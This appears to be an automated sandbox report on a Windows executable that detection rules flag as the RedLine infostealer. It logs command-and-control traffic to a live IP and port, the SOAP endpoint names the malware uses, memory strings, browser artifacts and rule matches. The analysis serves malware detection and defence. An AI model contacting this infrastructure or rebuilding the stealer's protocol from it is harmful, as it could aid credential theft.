Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49745

Source: global traffic

TCP traffic: 192.168.2.4:49741 -> 185.222.57.84:55615

Source: global traffic	HTTP traffic detected: GET /geoip HTTP/1.1Host: api.ip.sbConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.57.84:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 185.222.57.84:55615Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 185.222.57.84:55615Content-Length: 927735Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 185.222.57.84:55615Content-Length: 927727Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive

Source: Joe Sandbox View

IP Address: 104.26.12.31 104.26.12.31

Source: Joe Sandbox View

ASN Name: ROOTLAYERNETNL ROOTLAYERNETNL

Source: Joe Sandbox View

JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad

Source: unknown

HTTPS traffic detected: 104.26.12.31:443 -> 192.168.2.4:49743 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.84

Source: global traffic

HTTP traffic detected: GET /geoip HTTP/1.1Host: api.ip.sbConnection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: api.ip.sb

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.57.84:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive

Source: chTJmCR9bS.exe, 00000002.00000002.1930362222.000000000374E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.222.57.84:5
Source: chTJmCR9bS.exe, 00000002.00000002.1930362222.000000000359B000.00000004.00000800.00020000.00000000.sdmp, chTJmCR9bS.exe, 00000002.00000002.1930362222.00000000034AF000.00000004.00000800.00020000.00000000.sdmp, chTJmCR9bS.exe, 00000002.00000002.1930362222.0000000003421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.222.57.84:55615
Source: chTJmCR9bS.exe, 00000002.00000002.1930362222.0000000003421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.222.57.84:55615/
Source: chTJmCR9bS.exe, 00000002.00000002.1930362222.000000000374E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.222.57.84:55615t-
Source: chTJmCR9bS.exe, 00000002.00000002.1930362222.000000000359B000.00000004.00000800.00020000.00000000.sdmp, chTJmCR9bS.exe, 00000002.00000002.1930362222.00000000034AF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: chTJmCR9bS.exe, 00000002.00000002.1930362222.0000000003421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: chTJmCR9bS.exe, 00000002.00000002.1930362222.0000000003421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: chTJmCR9bS.exe, 00000002.00000002.1930362222.0000000003421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: chTJmCR9bS.exe, 00000002.00000002.1930362222.0000000003421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX
Source: chTJmCR9bS.exe, 00000002.00000002.1930362222.0000000003421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: chTJmCR9bS.exe, 00000002.00000002.1930362222.0000000003421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: chTJmCR9bS.exe, 00000002.00000002.1930362222.0000000003421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/
Source: chTJmCR9bS.exe, 00000002.00000002.1930362222.0000000003421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/0
Source: chTJmCR9bS.exe, 00000002.00000002.1930362222.00000000034AF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/D
Source: chTJmCR9bS.exe, 00000002.00000002.1930362222.0000000003421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
Source: chTJmCR9bS.exe, 00000002.00000002.1930362222.0000000003421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
Source: chTJmCR9bS.exe, 00000002.00000002.1930362222.0000000003470000.00000004.00000800.00020000.00000000.sdmp, chTJmCR9bS.exe, 00000002.00000002.1930362222.0000000003421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
Source: chTJmCR9bS.exe, 00000002.00000002.1930362222.0000000003421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
Source: chTJmCR9bS.exe, 00000002.00000002.1930362222.000000000374E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpd
Source: chTJmCR9bS.exe, 00000002.00000002.1930362222.00000000034AF000.00000004.00000800.00020000.00000000.sdmp, chTJmCR9bS.exe, 00000002.00000002.1930362222.0000000003470000.00000004.00000800.00020000.00000000.sdmp, chTJmCR9bS.exe, 00000002.00000002.1930362222.0000000003421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
Source: chTJmCR9bS.exe, 00000002.00000002.1930362222.0000000003421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
Source: chTJmCR9bS.exe, 00000002.00000002.1930362222.000000000359B000.00000004.00000800.00020000.00000000.sdmp, chTJmCR9bS.exe, 00000002.00000002.1930362222.0000000003421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
Source: chTJmCR9bS.exe, 00000002.00000002.1930362222.0000000003421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
Source: chTJmCR9bS.exe, 00000002.00000002.1930362222.0000000003421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
Source: chTJmCR9bS.exe, 00000002.00000002.1930362222.0000000003421000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
Source: chTJmCR9bS.exe, 00000000.00000002.1827234812.00000000073C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: chTJmCR9bS.exe, 00000000.00000002.1827074735.00000000062B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.ascendercorp.com/typedesigners.htmlQ
Source: chTJmCR9bS.exe, 00000000.00000002.1827234812.00000000073C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: chTJmCR9bS.exe, 00000000.00000002.1827234812.00000000073C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: chTJmCR9bS.exe, 00000000.00000002.1827234812.00000000073C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: chTJmCR9bS.exe, 00000000.00000002.1827234812.00000000073C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: chTJmCR9bS.exe, 00000000.00000002.1827234812.00000000073C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: chTJmCR9bS.exe, 00000000.00000002.1827234812.00000000073C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: chTJmCR9bS.exe, 00000000.00000002.1827234812.00000000073C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: chTJmCR9bS.exe, 00000000.00000002.1827234812.00000000073C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: chTJmCR9bS.exe, 00000000.00000002.1827234812.00000000073C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: chTJmCR9bS.exe, 00000000.00000002.1827234812.00000000073C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: chTJmCR9bS.exe, 00000000.00000002.1827234812.00000000073C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: chTJmCR9bS.exe, 00000000.00000002.1827234812.00000000073C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: chTJmCR9bS.exe, 00000000.00000002.1827234812.00000000073C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: chTJmCR9bS.exe, 00000000.00000002.1827234812.00000000073C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: chTJmCR9bS.exe, 00000000.00000002.1827234812.00000000073C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: chTJmCR9bS.exe, 00000000.00000002.1827234812.00000000073C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: chTJmCR9bS.exe, 00000000.00000002.1827118138.00000000062DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.itcfonts.k
Source: chTJmCR9bS.exe, 00000000.00000002.1827234812.00000000073C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: chTJmCR9bS.exe, 00000000.00000002.1827234812.00000000073C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: chTJmCR9bS.exe, 00000000.00000002.1827234812.00000000073C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: chTJmCR9bS.exe, 00000000.00000002.1827165764.00000000062F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com&
Source: chTJmCR9bS.exe, 00000000.00000002.1827234812.00000000073C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: chTJmCR9bS.exe, 00000000.00000002.1827234812.00000000073C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: chTJmCR9bS.exe, 00000000.00000002.1827234812.00000000073C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: chTJmCR9bS.exe, 00000000.00000002.1827234812.00000000073C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: chTJmCR9bS.exe, 00000000.00000002.1827234812.00000000073C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: tmp4B69.tmp.2.dr, tmp4B36.tmp.2.dr, tmp4B58.tmp.2.dr, tmp4B59.tmp.2.dr, tmp4B47.tmp.2.dr, tmp4B15.tmp.2.dr, tmp11B3.tmp.2.dr, tmp4B05.tmp.2.dr, tmp4B26.tmp.2.dr, tmp11B2.tmp.2.dr, tmp843D.tmp.2.dr, tmp11C3.tmp.2.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chTJmCR9bS.exe, chTJmCR9bS.exe, 00000002.00000002.1927566473.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
Source: chTJmCR9bS.exe, chTJmCR9bS.exe, 00000002.00000002.1927566473.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
Source: tmp4B69.tmp.2.dr, tmp4B36.tmp.2.dr, tmp4B58.tmp.2.dr, tmp4B59.tmp.2.dr, tmp4B47.tmp.2.dr, tmp4B15.tmp.2.dr, tmp11B3.tmp.2.dr, tmp4B05.tmp.2.dr, tmp4B26.tmp.2.dr, tmp11B2.tmp.2.dr, tmp843D.tmp.2.dr, tmp11C3.tmp.2.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: tmp4B69.tmp.2.dr, tmp4B36.tmp.2.dr, tmp4B58.tmp.2.dr, tmp4B59.tmp.2.dr, tmp4B47.tmp.2.dr, tmp4B15.tmp.2.dr, tmp11B3.tmp.2.dr, tmp4B05.tmp.2.dr, tmp4B26.tmp.2.dr, tmp11B2.tmp.2.dr, tmp843D.tmp.2.dr, tmp11C3.tmp.2.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: tmp4B69.tmp.2.dr, tmp4B36.tmp.2.dr, tmp4B58.tmp.2.dr, tmp4B59.tmp.2.dr, tmp4B47.tmp.2.dr, tmp4B15.tmp.2.dr, tmp11B3.tmp.2.dr, tmp4B05.tmp.2.dr, tmp4B26.tmp.2.dr, tmp11B2.tmp.2.dr, tmp843D.tmp.2.dr, tmp11C3.tmp.2.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: tmp4B69.tmp.2.dr, tmp4B36.tmp.2.dr, tmp4B58.tmp.2.dr, tmp4B59.tmp.2.dr, tmp4B47.tmp.2.dr, tmp4B15.tmp.2.dr, tmp11B3.tmp.2.dr, tmp4B05.tmp.2.dr, tmp4B26.tmp.2.dr, tmp11B2.tmp.2.dr, tmp843D.tmp.2.dr, tmp11C3.tmp.2.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: tmp4B69.tmp.2.dr, tmp4B36.tmp.2.dr, tmp4B58.tmp.2.dr, tmp4B59.tmp.2.dr, tmp4B47.tmp.2.dr, tmp4B15.tmp.2.dr, tmp11B3.tmp.2.dr, tmp4B05.tmp.2.dr, tmp4B26.tmp.2.dr, tmp11B2.tmp.2.dr, tmp843D.tmp.2.dr, tmp11C3.tmp.2.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: tmp4B69.tmp.2.dr, tmp4B36.tmp.2.dr, tmp4B58.tmp.2.dr, tmp4B59.tmp.2.dr, tmp4B47.tmp.2.dr, tmp4B15.tmp.2.dr, tmp11B3.tmp.2.dr, tmp4B05.tmp.2.dr, tmp4B26.tmp.2.dr, tmp11B2.tmp.2.dr, tmp843D.tmp.2.dr, tmp11C3.tmp.2.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: chTJmCR9bS.exe, chTJmCR9bS.exe, 00000002.00000002.1927566473.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/ip%appdata%
Source: tmp4B69.tmp.2.dr, tmp4B36.tmp.2.dr, tmp4B58.tmp.2.dr, tmp4B59.tmp.2.dr, tmp4B47.tmp.2.dr, tmp4B15.tmp.2.dr, tmp11B3.tmp.2.dr, tmp4B05.tmp.2.dr, tmp4B26.tmp.2.dr, tmp11B2.tmp.2.dr, tmp843D.tmp.2.dr, tmp11C3.tmp.2.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: tmp4B69.tmp.2.dr, tmp4B36.tmp.2.dr, tmp4B58.tmp.2.dr, tmp4B59.tmp.2.dr, tmp4B47.tmp.2.dr, tmp4B15.tmp.2.dr, tmp11B3.tmp.2.dr, tmp4B05.tmp.2.dr, tmp4B26.tmp.2.dr, tmp11B2.tmp.2.dr, tmp843D.tmp.2.dr, tmp11C3.tmp.2.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.chTJmCR9bS.exe.450ad90.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0.2.chTJmCR9bS.exe.450ad90.3.unpack, type: UNPACKEDPE	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 0.2.chTJmCR9bS.exe.450ad90.3.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.chTJmCR9bS.exe.43ab7e0.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0.2.chTJmCR9bS.exe.43ab7e0.4.unpack, type: UNPACKEDPE	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 0.2.chTJmCR9bS.exe.43ab7e0.4.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 2.2.chTJmCR9bS.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 2.2.chTJmCR9bS.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 2.2.chTJmCR9bS.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.chTJmCR9bS.exe.450ad90.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0.2.chTJmCR9bS.exe.450ad90.3.raw.unpack, type: UNPACKEDPE	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 0.2.chTJmCR9bS.exe.450ad90.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.chTJmCR9bS.exe.43ab7e0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0.2.chTJmCR9bS.exe.43ab7e0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 0.2.chTJmCR9bS.exe.43ab7e0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000002.00000002.1927566473.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 00000000.00000002.1824869359.000000000450A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 00000000.00000002.1824869359.0000000004347000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: Process Memory Space: chTJmCR9bS.exe PID: 7384, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: Process Memory Space: chTJmCR9bS.exe PID: 7572, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown

Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Code function: 0_2_0164E0CC	0_2_0164E0CC
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Code function: 0_2_078A5D40	0_2_078A5D40
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Code function: 0_2_078AD688	0_2_078AD688
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Code function: 0_2_078AF5B3	0_2_078AF5B3
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Code function: 0_2_078AF5C0	0_2_078AF5C0
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Code function: 0_2_078ADF18	0_2_078ADF18
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Code function: 0_2_078A4B20	0_2_078A4B20
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Code function: 0_2_078A4B30	0_2_078A4B30
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Code function: 0_2_078ADAE0	0_2_078ADAE0
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Code function: 0_2_078B75E8	0_2_078B75E8
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Code function: 0_2_078B9F50	0_2_078B9F50
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Code function: 0_2_078B4590	0_2_078B4590
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Code function: 0_2_078B75DA	0_2_078B75DA
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Code function: 2_2_0176E7B0	2_2_0176E7B0
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Code function: 2_2_0176DC90	2_2_0176DC90
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Code function: 2_2_05A42758	2_2_05A42758
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Code function: 2_2_05A42B98	2_2_05A42B98
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Code function: 2_2_05A40B48	2_2_05A40B48
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Code function: 2_2_05A472B8	2_2_05A472B8
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Code function: 2_2_05A404D0	2_2_05A404D0
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Code function: 2_2_05A42FD0	2_2_05A42FD0
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Code function: 2_2_05A4CAF0	2_2_05A4CAF0
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Code function: 2_2_06C34468	2_2_06C34468
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Code function: 2_2_06C39628	2_2_06C39628
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Code function: 2_2_06C31210	2_2_06C31210
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Code function: 2_2_06C33320	2_2_06C33320
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Code function: 2_2_06C3DD00	2_2_06C3DD00
Source: C:\Users\user\Desktop\chTJmCR9bS.exe	Code function: 2_2_06C3D108	2_2_06C3D108

Source: chTJmCR9bS.exe, 00000000.00000002.1824869359.0000000004347000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameImplosions.exe4 vs chTJmCR9bS.exe
Source: chTJmCR9bS.exe, 00000000.00000002.1824869359.000000000450A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameImplosions.exe4 vs chTJmCR9bS.exe
Source: chTJmCR9bS.exe, 00000000.00000002.1824869359.000000000450A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs chTJmCR9bS.exe
Source: chTJmCR9bS.exe, 00000000.00000002.1823596554.00000000033DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameImplosions.exe4 vs chTJmCR9bS.exe
Source: chTJmCR9bS.exe, 00000000.00000002.1822059095.000000000148E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs chTJmCR9bS.exe
Source: chTJmCR9bS.exe, 00000000.00000002.1826964666.0000000005CD0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs chTJmCR9bS.exe
Source: chTJmCR9bS.exe, 00000000.00000002.1823596554.0000000003301000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs chTJmCR9bS.exe
Source: chTJmCR9bS.exe, 00000000.00000002.1828781159.0000000009490000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs chTJmCR9bS.exe
Source: chTJmCR9bS.exe, 00000000.00000000.1757800868.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameyZZa.exe< vs chTJmCR9bS.exe
Source: chTJmCR9bS.exe, 00000000.00000002.1823596554.000000000343E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs chTJmCR9bS.exe
Source: chTJmCR9bS.exe, 00000002.00000002.1930362222.000000000359B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamefirefox.exe0 vs chTJmCR9bS.exe
Source: chTJmCR9bS.exe, 00000002.00000002.1930362222.000000000359B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs chTJmCR9bS.exe
Source: chTJmCR9bS.exe, 00000002.00000002.1930362222.000000000359B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^q,\\StringFileInfo\\000004B0\\OriginalFilename vs chTJmCR9bS.exe
Source: chTJmCR9bS.exe, 00000002.00000002.1930362222.000000000359B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamechrome.exe< vs chTJmCR9bS.exe
